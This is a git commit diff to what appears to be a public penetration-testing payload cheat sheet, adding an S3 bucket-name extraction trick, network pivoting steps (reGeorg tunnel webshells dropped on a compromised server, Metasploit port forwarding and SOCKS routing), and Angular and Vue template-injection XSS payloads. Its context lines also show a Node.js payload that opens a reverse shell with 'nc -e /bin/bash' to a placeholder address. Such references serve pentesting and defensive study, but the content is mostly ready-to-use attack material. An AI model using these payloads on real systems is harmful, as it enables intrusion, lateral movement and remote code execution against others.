reGeorg + Meterpreter socks + S3 trick name

patch-1
Swissky 2018-11-24 13:49:08 +01:00
parent 0309a2efbd
commit 565b40d177
4 changed files with 60 additions and 5 deletions

View File

@ -36,6 +36,14 @@ Their names are also listed if the listing is enabled.
<Name>adobe-REDACTED-REDACTED-REDACTED</Name>
```
Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
```xml
http://example.com/resources/id%C0
eg: http://redacted/avatar/123%C0
```
## Basic test - Listing the files
```bash

View File

@ -59,8 +59,38 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
```python
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
```
## Metasploit
```c
portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a
```
## Rpivot
@ -141,3 +171,4 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)

View File

@ -153,6 +153,10 @@ or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)

View File

@ -1,5 +1,13 @@
# XSS in Angular
> Angular as of version 1.6 have removed the sandbox altogether
Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
```javascript
{{constructor.constructor('alert(1)')()}}
```
Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
```javascript
@ -8,7 +16,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
```javascript
{{0[a='constructor'][a]('alert(1)')()}}
@ -16,7 +24,7 @@ Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/105588761961
{{$on.constructor('alert(1)')()}}
```
Angular 1.5.9
Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
```javascript
{{
@ -140,3 +148,7 @@ Vue JS
```javascript
{{constructor.constructor('alert(1)')()}}
```
## Thanks
- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)